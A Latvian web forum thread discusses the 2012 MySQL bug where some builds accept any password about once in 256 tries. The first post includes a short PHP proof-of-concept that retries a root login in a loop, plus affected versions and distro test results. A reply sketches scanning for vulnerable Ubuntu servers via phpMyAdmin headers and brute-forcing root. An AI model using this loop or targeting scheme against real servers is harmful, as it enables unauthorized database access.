Jump to content
php.lv forumi

MySQL apdeitojām ?


krikulis

Recommended Posts

Ref: http://seclists.org/...sec/2012/q2/493

Īsā baga versija - ja MySQL ir kompilēts specifiskos apstākļos, tad pastāv 1/256 iespēja, ka akceptēs jebkuru paroli :>

PoC exploits

<?php
while(true) {
if(mysql_connect("localhost", "root", "dapilniigipofig")){
   break;
} 
}
//sheit nu rakstam kādus kverijus gribam :)))

Affected versijas: 5.1.61, 5.2.11, 5.3.5, 5.5.22 :)))

Tas, ko varēja novilkt MySQL.com lapā nebija ievainojams (windowisti atpūšās).

Ar roku kompilējot parasti optimizācijas neieslēdzās :)))

Reālākā prbl ir tiem, kas izmanto Linux distru packages (vārdu sakot, normāliem cilvēkiem)

 

Pēc testiem:

MySQL-server package zem 64bit Ubuntu (12.04, 10.04, 11.04) salaužās (nupat gan atnāca updeits.

Debian Squeeze|Lenny - nelaužās

CentOS 5/6 - nelaužās

Edited by krikulis
Link to comment
Share on other sites

Aleksejs, cik sapratu, tas strādā, ja tiek izmantoti konkrēti optimizācijas flagi, jo klasiski GCC no sources kompilējot nesanāca (vismaz uz FreeBSD no portiem buildots MySQL nesanāca vulnerabls). Lielākais fakaps ir tas, ka ir ievainojami ubuntu packagi. Sliktie puiši principā var skenēt netu pēc phpMyAdmin ,skatoties pēc Server headera vai tas ir Ubuntu un 64 biti. Tad bruteforcot root paroli :)))

Smieklīgi, ka vecais joks

 

 

 

"Chinese hackers cracked Pentagon's server. Each of them tried to login with the password "Mao Tse-Tung". On the 2,934,568th attempt the server agreed."

izrādījies patiess :D

 

 


  •  

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Loading...
×
×
  • Create New...